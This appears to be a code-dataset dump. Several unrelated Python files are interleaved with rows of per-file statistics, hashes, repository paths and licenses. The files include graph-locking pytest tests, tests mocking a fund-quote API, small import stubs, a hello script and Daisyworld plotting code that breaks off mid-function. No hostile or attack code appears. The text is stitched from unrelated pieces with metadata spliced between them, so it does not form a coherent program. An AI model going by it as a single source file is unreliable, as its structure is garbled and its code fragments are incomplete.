cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
operation_id_1 = cgraph.get_unique_operation_id()
root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))
assert cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_1)[0]
assert cgraph.check_and_renew_root_locks(root_ids=[root_id],
operation_id=operation_id_1)
@pytest.mark.timeout(30)
def test_lock_merge_lock_old_id(self, gen_graph):
"""
No connection between 1, 2 and 3
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1 │ 3 │
│ 2 │ │
└─────┴─────┘
(1) Merge (includes lock opid 1)
(2) Try lock opid 2 --> should be successful and return new root id
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 1),
to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))
new_root_ids = cgraph.add_edges("Chuck Norris", [to_label(cgraph, 1, 0, 0, 0, 1),
to_label(cgraph, 1, 0, 0, 0, 2)], affinities=1.)
assert new_root_ids is not None
operation_id_2 = cgraph.get_unique_operation_id()
success, new_root_id = cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_2,
max_tries=10, waittime_s=.5)
cgraph.logger.debug(new_root_id)
assert success
assert new_root_ids[0] == new_root_id
| 45.863683
| 162
| 0.555526
| 19,945
| 135,252
| 3.703836
| 0.028127
| 0.048651
| 0.038011
| 0.129249
| 0.894806
| 0.873851
| 0.857851
| 0.838249
| 0.811311
| 0.786228
| 0
| 0.077287
| 0.302125
| 135,252
| 2,948
| 163
| 45.87924
| 0.679645
| 0.127813
| 0
| 0.633371
| 0
| 0
| 0.01234
| 0.000645
| 0
| 0
| 0.006227
| 0.000339
| 0.232123
| 1
| 0.037457
| false
| 0.00227
| 0.010783
| 0.000568
| 0.057889
| 0.001703
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
594bfb1a451c5278cb6eb0568922591b031e3438
| 105
|
py
|
Python
|
office365/sharepoint/search/query/popularTenantQuery.py
|
wreiner/Office365-REST-Python-Client
|
476bbce4f5928a140b4f5d33475d0ac9b0783530
|
[
"MIT"
] | 544
|
2016-08-04T17:10:16.000Z
|
2022-03-31T07:17:20.000Z
|
office365/sharepoint/search/query/popularTenantQuery.py
|
wreiner/Office365-REST-Python-Client
|
476bbce4f5928a140b4f5d33475d0ac9b0783530
|
[
"MIT"
] | 438
|
2016-10-11T12:24:22.000Z
|
2022-03-31T19:30:35.000Z
|
office365/sharepoint/search/query/popularTenantQuery.py
|
wreiner/Office365-REST-Python-Client
|
476bbce4f5928a140b4f5d33475d0ac9b0783530
|
[
"MIT"
] | 202
|
2016-08-22T19:29:40.000Z
|
2022-03-30T20:26:15.000Z
|
from office365.runtime.client_value import ClientValue
class PopularTenantQuery(ClientValue):
pass
| 17.5
| 54
| 0.828571
| 11
| 105
| 7.818182
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.032609
| 0.12381
| 105
| 5
| 55
| 21
| 0.902174
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
59728e393c4e17abe11271bfcc3dd74f28baee1f
| 28
|
py
|
Python
|
platehunter/platehunter/module/__init__.py
|
ZombieIce/A-Stock-Plate-Crawling
|
e0478c720513876562ebe2a48b9f3131dad63e47
|
[
"MIT"
] | 20
|
2018-10-09T18:53:01.000Z
|
2022-02-20T13:26:43.000Z
|
platehunter/platehunter/module/__init__.py
|
ZombieIce/A-Stock-Plate-Crawling
|
e0478c720513876562ebe2a48b9f3131dad63e47
|
[
"MIT"
] | 36
|
2018-09-20T19:27:54.000Z
|
2022-01-23T14:41:39.000Z
|
insta_hashtag_crawler/__init__.py
|
point1304/insta-hashtag-crawler
|
ee056f91d14e19404335fcc49360942acc2e15e8
|
[
"MIT"
] | 6
|
2021-09-25T14:03:57.000Z
|
2022-03-19T14:44:04.000Z
|
from .crawler import Crawler
| 28
| 28
| 0.857143
| 4
| 28
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 28
| 1
| 28
| 28
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
59987eb32850dcd0908c67453364b8a38745fe6e
| 68
|
py
|
Python
|
tests/unit/test_thicket/test_finders.py
|
GabrielC101/filer
|
d506ed804d10891cea33c3884896b6f0dfa08b88
|
[
"MIT"
] | null | null | null |
tests/unit/test_thicket/test_finders.py
|
GabrielC101/filer
|
d506ed804d10891cea33c3884896b6f0dfa08b88
|
[
"MIT"
] | 1
|
2017-12-19T19:38:22.000Z
|
2017-12-19T19:38:22.000Z
|
tests/unit/test_thicket/test_finders.py
|
GabrielC101/filer
|
d506ed804d10891cea33c3884896b6f0dfa08b88
|
[
"MIT"
] | null | null | null |
from thicket import finders
def test_import():
assert finders
| 11.333333
| 27
| 0.75
| 9
| 68
| 5.555556
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205882
| 68
| 5
| 28
| 13.6
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.666667
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
59d7e8494ca25c551fbec6bc143f2353d97b0f85
| 42
|
py
|
Python
|
d3ct/plugins/out/__init__.py
|
metro-nom/d3ct
|
2d619b46fac7de29c031a3737570ca62e33d8c2f
|
[
"BSD-3-Clause"
] | null | null | null |
d3ct/plugins/out/__init__.py
|
metro-nom/d3ct
|
2d619b46fac7de29c031a3737570ca62e33d8c2f
|
[
"BSD-3-Clause"
] | null | null | null |
d3ct/plugins/out/__init__.py
|
metro-nom/d3ct
|
2d619b46fac7de29c031a3737570ca62e33d8c2f
|
[
"BSD-3-Clause"
] | null | null | null |
# flake8: noqa
from .stdout import StdOut
| 14
| 26
| 0.761905
| 6
| 42
| 5.333333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0.166667
| 42
| 2
| 27
| 21
| 0.885714
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ab7b6735b1b7be9de1c5c14faeb2e6fcf2f517be
| 43
|
py
|
Python
|
BirdCommandTests/Resources/hello.py
|
hergin/BirdCommand
|
64e87199f27fb10a8d5c11de8b31474786a95510
|
[
"Apache-2.0"
] | null | null | null |
BirdCommandTests/Resources/hello.py
|
hergin/BirdCommand
|
64e87199f27fb10a8d5c11de8b31474786a95510
|
[
"Apache-2.0"
] | 2
|
2022-03-11T14:15:32.000Z
|
2022-03-19T20:17:33.000Z
|
BirdCommandTests/Resources/hello.py
|
hergin/BirdCommand
|
64e87199f27fb10a8d5c11de8b31474786a95510
|
[
"Apache-2.0"
] | null | null | null |
import sys
print("Hello, "+sys.argv[1]+"!")
| 21.5
| 32
| 0.627907
| 7
| 43
| 3.857143
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025
| 0.069767
| 43
| 2
| 32
| 21.5
| 0.65
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
abafaffe850f5ad038e992cc605a8658d0b5ae83
| 7,158
|
py
|
Python
|
app/routers/brandnewday_test.py
|
nbult/quotes
|
3bfe31a0c5c629c4883a2cf10bf582a9f16ea209
|
[
"MIT"
] | null | null | null |
app/routers/brandnewday_test.py
|
nbult/quotes
|
3bfe31a0c5c629c4883a2cf10bf582a9f16ea209
|
[
"MIT"
] | 1
|
2021-08-25T11:12:59.000Z
|
2021-08-25T11:12:59.000Z
|
app/routers/brandnewday_test.py
|
nickybulthuis/quotes
|
3bfe31a0c5c629c4883a2cf10bf582a9f16ea209
|
[
"MIT"
] | null | null | null |
import json
from datetime import date, datetime
import pytest
import responses
from fastapi.testclient import TestClient
from .brandnewday import funds_cache, quote_cache
from ..main import app
from ..models import Quote
client = TestClient(app)
prefix = '/brandnewday/'
@pytest.fixture(autouse=True)
def clear_cache():
funds_cache.clear()
quote_cache.clear()
yield
def setup_get_funds_response():
body = {'Message': json.dumps([{"Key": "1002", "Value": "bnd-wereld-indexfonds-c-hedged"},
{"Key": "1012", "Value": "bnd-wereld-indexfonds-c-unhedged"}])}
responses.add(responses.GET, 'https://secure.brandnewday.nl/service/getfundsnew/', json=body, status=200)
@responses.activate
def test_get_funds_returns_funds_list():
setup_get_funds_response()
response = client.get(prefix, allow_redirects=False)
assert response.status_code == 200
assert response.json() == ['bnd-wereld-indexfonds-c-hedged', 'bnd-wereld-indexfonds-c-unhedged']
@responses.activate
def test_get_funds_returns_502():
responses.add(responses.GET, 'https://secure.brandnewday.nl/service/getfundsnew/',
body='error', status=502)
response = client.get(prefix, allow_redirects=False)
assert response.status_code == 502
def test_get_quotes_unknown_name_returns_http404():
setup_get_funds_response()
response = client.get(prefix + 'unknown', allow_redirects=False)
assert response.status_code == 404
@responses.activate
def test_get_quotes_server_error_returns_http502():
setup_get_funds_response()
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
body='error',
status=500
)
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert response.status_code == 502
@responses.activate
def test_get_quotes_invalid_page():
setup_get_funds_response()
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged?page=0')
assert response.status_code == 400
@responses.activate
def test_get_quotes_known_name_returns_http200():
setup_get_funds_response()
body = {'Data': [
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535882, 'BidRate': 13.535882, 'AskRate': 13.535882,
'RateDate': '/Date(1616284800000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535846, 'BidRate': 13.535846, 'AskRate': 13.535846,
'RateDate': '/Date(1616198400000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535809, 'BidRate': 13.535809, 'AskRate': 13.535809,
'RateDate': '/Date(1616112000000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
],
'Total': 1224, 'AggregateResults': None, 'Errors': None}
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
json=body,
headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'},
match=[
responses.urlencoded_params_matcher({'page': '1',
'pageSize': '60',
'fundId': '1012',
'startDate': '01-01-2010',
'endDate': date.today().strftime('%d-%m-%Y'),
})
],
status=200
)
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert len(quote_cache) == 1
assert response.status_code == 200
assert response.json() == [{'Close': 13.535882, 'Date': '2021-03-21T00:00:00'},
{'Close': 13.535846, 'Date': '2021-03-20T00:00:00'},
{'Close': 13.535809, 'Date': '2021-03-19T00:00:00'}]
@responses.activate
def test_get_quotes_are_cached():
setup_get_funds_response()
body = {'Data': [
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535882, 'BidRate': 13.535882, 'AskRate': 13.535882,
'RateDate': '/Date(1616284800000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535846, 'BidRate': 13.535846, 'AskRate': 13.535846,
'RateDate': '/Date(1616198400000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535809, 'BidRate': 13.535809, 'AskRate': 13.535809,
'RateDate': '/Date(1616112000000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
],
'Total': 1224, 'AggregateResults': None, 'Errors': None}
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
json=body,
headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'},
match=[responses.urlencoded_params_matcher(
{'page': '1', 'pageSize': '60', 'fundId': '1012', 'startDate': '01-01-2010',
'endDate': date.today().strftime('%d-%m-%Y')})],
status=200
)
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
body='error',
headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'},
match=[responses.urlencoded_params_matcher(
{'page': '1', 'pageSize': '60', 'fundId': '1012', 'startDate': '01-01-2010',
'endDate': date.today().strftime('%d-%m-%Y')})],
status=500
)
assert len(quote_cache) == 0
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert response.status_code == 200
assert response.json() == [{'Close': 13.535882, 'Date': '2021-03-21T00:00:00'},
{'Close': 13.535846, 'Date': '2021-03-20T00:00:00'},
{'Close': 13.535809, 'Date': '2021-03-19T00:00:00'}]
assert len(quote_cache) == 1
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert response.status_code == 200
assert quote_cache['1012@1'] == [Quote(Date=datetime(2021, 3, 21, 0, 0, 0), Close=13.535882),
Quote(Date=datetime(2021, 3, 20, 0, 0, 0), Close=13.535846),
Quote(Date=datetime(2021, 3, 19, 0, 0, 0), Close=13.535809)]
| 41.137931
| 110
| 0.607572
| 775
| 7,158
| 5.505806
| 0.181935
| 0.050621
| 0.040075
| 0.042184
| 0.856105
| 0.803843
| 0.759784
| 0.731427
| 0.706351
| 0.694399
| 0
| 0.14894
| 0.222408
| 7,158
| 173
| 111
| 41.375723
| 0.617679
| 0
| 0
| 0.641791
| 0
| 0
| 0.303996
| 0.111065
| 0
| 0
| 0
| 0
| 0.11194
| 1
| 0.067164
| false
| 0
| 0.059701
| 0
| 0.126866
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
abe3cbe49477fe37d4fc16249de8a10f4fb4a013
| 18
|
py
|
Python
|
mit_semseg/lib/utils/__init__.py
|
starkgines/PDI
|
dd6908c022179f935ae25d3afee9ea44bb49f162
|
[
"BSD-3-Clause"
] | 4,303
|
2018-04-08T00:48:44.000Z
|
2022-03-31T12:54:08.000Z
|
mit_semseg/lib/utils/__init__.py
|
starkgines/PDI
|
dd6908c022179f935ae25d3afee9ea44bb49f162
|
[
"BSD-3-Clause"
] | 212
|
2018-04-08T16:02:59.000Z
|
2022-03-16T14:52:44.000Z
|
mit_semseg/lib/utils/__init__.py
|
starkgines/PDI
|
dd6908c022179f935ae25d3afee9ea44bb49f162
|
[
"BSD-3-Clause"
] | 1,057
|
2018-04-08T03:29:26.000Z
|
2022-03-30T17:36:12.000Z
|
from .th import *
| 9
| 17
| 0.666667
| 3
| 18
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 18
| 1
| 18
| 18
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
abe9baf8318a46fc0311d26e659c7ccdb9f8b58b
| 162
|
py
|
Python
|
util/time.py
|
thorwhalen/ut
|
353a4629c35a2cca76ef91a4d5209afe766433b4
|
[
"MIT"
] | 4
|
2016-12-17T20:06:10.000Z
|
2021-11-19T04:45:29.000Z
|
util/time.py
|
thorwhalen/ut
|
353a4629c35a2cca76ef91a4d5209afe766433b4
|
[
"MIT"
] | 11
|
2021-01-06T05:35:11.000Z
|
2022-03-11T23:28:31.000Z
|
util/time.py
|
thorwhalen/ut
|
353a4629c35a2cca76ef91a4d5209afe766433b4
|
[
"MIT"
] | 3
|
2015-06-12T10:44:16.000Z
|
2021-07-26T18:39:47.000Z
|
from warnings import warn
warn('Deprecated: Moved to ut.util.utime (to avoid name conflict with standard lib `time`)')
from ut.util.utime import * # move here
| 27
| 92
| 0.746914
| 26
| 162
| 4.653846
| 0.730769
| 0.099174
| 0.181818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160494
| 162
| 5
| 93
| 32.4
| 0.889706
| 0.055556
| 0
| 0
| 0
| 0
| 0.556291
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
e64e4471df6551917b2b1289cce293fbc929f162
| 12,219
|
py
|
Python
|
daisy-world/dashdir/plotting.py
|
frossmann/addon_containers
|
de6dde175947b24bbfa35d94d44c9d9633a73226
|
[
"BSD-3-Clause"
] | null | null | null |
daisy-world/dashdir/plotting.py
|
frossmann/addon_containers
|
de6dde175947b24bbfa35d94d44c9d9633a73226
|
[
"BSD-3-Clause"
] | null | null | null |
daisy-world/dashdir/plotting.py
|
frossmann/addon_containers
|
de6dde175947b24bbfa35d94d44c9d9633a73226
|
[
"BSD-3-Clause"
] | 2
|
2021-11-16T06:05:02.000Z
|
2021-11-18T17:16:35.000Z
|
import plotly.graph_objects as go
import plotly.figure_factory as ff
import numpy as np
import calculations as calc
from plotly.subplots import make_subplots
def initialize_albedo_plot(T_min, T_opt):
# how does the growth curve of the Daisies look like?
gw = []
gb = []
# amount of intervals to plot
nt = 20
t0 = 0
t1 = 45
dT = (t1 - t0) / nt
tempv = [t0 + i * dT for i in range(nt)]
for t in tempv:
gw.append(calc.DaisyGrowth(t + 273.15, "w", T_min, T_opt))
gb.append(calc.DaisyGrowth(t + 273.15, "b", T_min, T_opt))
albedo_plot = go.Figure()
albedo_plot.add_hrect(
xref="paper",
yref="paper",
x0=1,
x1=1.5,
y0=-15,
y1=100,
line_width=0,
fillcolor="white",
opacity=1,
)
albedo_plot.update_xaxes(showgrid=True, zeroline=False)
albedo_plot.update_yaxes(showgrid=True, zeroline=False)
albedo_plot.add_trace(go.Scatter(x=tempv, y=gw, name="gw"))
albedo_plot.add_trace(go.Scatter(x=tempv, y=gb, name="gb"))
albedo_plot.update_layout(xaxis_title="tempv", yaxis_title="growth")
albedo_plot.update_layout(xaxis_title="Temp [degC]", yaxis_title="Ratio")
albedo_plot.update_xaxes(range=[0, t1])
albedo_plot.update_yaxes(range=[0, 1])
albedo_plot.layout.title = "Growth curve of daisies"
return albedo_plot
def constant_flux_temp(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt
):
# initial areas are embedded in here but should be passed in as an
# argument later if we want to change the initial conditions
# externally...
areas = {"w": 0.01, "b": 0.01} # initial conditions for area
# solve the constant flux problem:
xgens, gens = calc.update_constant_flux(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt, areas
)
# temperatures plot
fig = go.Figure()
fig.add_hrect(
xref="paper",
yref="paper",
x0=1,
x1=1.5,
y0=-15,
y1=100,
line_width=0,
fillcolor="white",
opacity=1,
)
fig.update_xaxes(showgrid=True, zeroline=False)
fig.update_yaxes(showgrid=True, zeroline=False)
fig.add_trace(
go.Scatter(
x=gens,
y=[x["Tw"] - 273.15 for x in xgens],
name="White daisies temperature",
line=dict(color="lavender", width=8),
)
)
fig.add_trace(
go.Scatter(
x=gens,
y=[x["Tb"] - 273.15 for x in xgens],
name="Black daisies temperature",
line=dict(color="black", width=3),
)
)
fig.add_trace(
go.Scatter(
x=gens,
y=[x["Tp"] - 273.15 for x in xgens],
name="Planet temperature",
line=dict(color="seagreen", width=5, dash="dot"),
)
)
fig.update_layout(
xaxis_title="Simulation Time (Daisy generation #)",
yaxis_title="Temperature [degC]",
)
fig.update_xaxes(range=[0, len(gens)])
fig.update_yaxes(range=[10, 40])
fig.layout.title = "Constant flux temperature with daisy generation"
fig.update_layout(plot_bgcolor="silver")
return fig
def constant_flux_area(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt
):
# initial areas are embedded in here but should be passed in as an
# argument later if we want to change the initial conditions
# externally...
areas = {"w": 0.01, "b": 0.01} # initial conditions for area
# solve the constant flux problem:
xgens, gens = calc.update_constant_flux(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt, areas
)
# make the figure:
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_hrect(
xref="paper",
yref="paper",
x0=1,
x1=1.5,
y0=-15,
y1=100,
line_width=0,
fillcolor="white",
opacity=1,
)
fig.update_xaxes(showgrid=True, zeroline=False)
fig.update_yaxes(showgrid=True, zeroline=False, secondary_y=False)
fig.update_yaxes(showgrid=False, zeroline=False, secondary_y=True)
fig.add_trace(
go.Scatter(
x=gens,
y=[100 * x["Sw"] for x in xgens],
name="White daisies area",
line=dict(color="lavender", width=8),
),
secondary_y=False,
)
fig.add_trace(
go.Scatter(
x=gens,
y=[100 * x["Sb"] for x in xgens],
name="Black daisies area",
line=dict(color="black", width=3),
),
secondary_y=False,
)
fig.add_trace(
go.Scatter(
x=gens,
y=[100 * x["Su"] for x in xgens],
name="Uninhabited area",
line=dict(color="saddlebrown", width=4),
),
secondary_y=False,
)
fig.add_trace(
go.Scatter(
x=gens,
y=[x["Ap"] for x in xgens],
name="Combined albedo",
line=dict(color="royalblue", dash="dash"),
),
secondary_y=True,
)
# fig.update_layout(xaxis_title="Generation number", yaxis_title="Fractional area")
fig.update_xaxes(title_text="Simulation Time (Daisy generation #)")
fig.update_yaxes(title_text="Inhabited area [%]", secondary_y=False)
fig.update_yaxes(title_text="Albedo", secondary_y=True)
fig.update_xaxes(range=[0, len(gens)])
fig.update_yaxes(range=[0, 100], secondary_y=False) # % area
fig.update_yaxes(range=[0.35, 0.65], secondary_y=True) # albedo
fig.layout.title = "Constant flux daisy coverage"
# fig.update_layout(paper_bgcolor="black")
fig.update_layout(plot_bgcolor="silver")
return fig
def varying_solar_flux_temp(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt
):
xeq, xeqbar, _, F = calc.update_equi_flux(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt
)
# fig = go.Figure(data=go.Scatter(x=F, y=[x["Tw"] - 273.15 for x in xeq]))
##
# # fig = make_subplots(rows=1, cols=2, subplot_titles=("Plot1", "Plot2"))
# make a list of arbitrary times to plot against
times = np.arange(0, len(F) + 1, 1)
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_hrect(
xref="paper",
yref="paper",
x0=1,
x1=1.5,
y0=-15,
y1=100,
line_width=0,
fillcolor="white",
opacity=1,
)
# # subplot 1
fig.update_xaxes(showgrid=True, zeroline=False)
fig.update_yaxes(showgrid=True, zeroline=False, secondary_y=False)
fig.update_yaxes(showgrid=False, zeroline=False, secondary_y=True)
fig.add_trace(
go.Scatter(
x=times,
y=[Fi * Fsnom for Fi in F],
name="Solar flux (right axis)",
line=dict(color="rgba(255, 255, 0, 0.3)", width=5),
),
secondary_y=True,
)
fig.add_trace(
go.Scatter(
x=times,
y=[x["Tw"] - 273.15 for x in xeq],
name="White daisies temperature",
line=dict(color="lavender", width=7),
),
secondary_y=False,
)
# fig.add_trace(
# go.Scatter(
# x=F,
# y=[x["Tw"] - 273.15 for x in xeqinv],
# name="White daisies temperature (backwards)",
# line=dict(color="lightskyblue", dash="dot", width=5),
# ),
# )
fig.add_trace(
go.Scatter(
x=times,
y=[x["Tb"] - 273.15 for x in xeq],
name="Black daisies temperature",
line=dict(color="black", width=3),
),
secondary_y=False,
)
# fig.add_trace(
# go.Scatter(
# x=F,
# y=[x["Tb"] - 273.15 for x in xeqinv],
# name="Black daisies temperature (backwards)",
# line=dict(color="darkslategray", dash="dot", width=3),
# ),
# )
fig.add_trace(
go.Scatter(
x=times,
y=[x["Tp"] - 273.15 for x in xeq],
name="Planet temperature",
line=dict(color="seagreen", width=5, dash="dot"),
),
secondary_y=False,
)
# fig.add_trace(
# go.Scatter(
# x=F,
# y=[x["Tp"] - 273.15 for x in xeqinv],
# name="Planet temperature (backwards)",
# line=dict(color="sienna", dash="dot", width=3),
# ),
# )
fig.add_trace(
go.Scatter(
x=times,
y=[x["Tp"] - 273.15 for x in xeqbar],
name="Planet temperature (without life)",
line=dict(color="gray", dash="dash", width=3),
),
secondary_y=False,
)
fig.update_xaxes(title="Simulation Time [Myr]", range=[0, times[-1]])
fig.update_yaxes(
title="Temperature [degC]",
range=[-20, 80],
secondary_y=False,
)
fig.update_yaxes(title_text="Solar flux [Wm-2]", secondary_y=True)
fig.update_layout(title_text="Equilibrium temperature vs solar flux")
fig.update_layout(plot_bgcolor="silver")
return fig
def varying_solar_flux_area(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt
):
xeq, _, _, F = calc.update_equi_flux(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt
)
# make a list of arbitrary times to plot against
times = np.arange(0, len(F) + 1, 1)
# fig = go.Figure(data=go.Scatter(x=F, y=[x["Tw"] - 273.15 for x in xeq]))
##
# # fig = make_subplots(rows=1, cols=2, subplot_titles=("Plot1", "Plot2"))
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_hrect(
xref="paper",
yref="paper",
x0=1,
x1=1.5,
y0=-15,
y1=100,
line_width=0,
fillcolor="white",
opacity=1,
)
# # subplot 1
fig.update_xaxes(showgrid=True, zeroline=False)
fig.update_yaxes(showgrid=False, zeroline=False, secondary_y=True)
fig.update_yaxes(showgrid=True, zeroline=False, secondary_y=False)
fig.add_trace(
go.Scatter(
x=times,
y=[Fi * Fsnom for Fi in F],
name="Solar flux (right axis)",
line=dict(color="rgba(255, 255, 0, 0.3)", width=5),
),
secondary_y=True,
)
fig.add_trace(
go.Scatter(
x=times,
y=[100 * x["Sw"] for x in xeq],
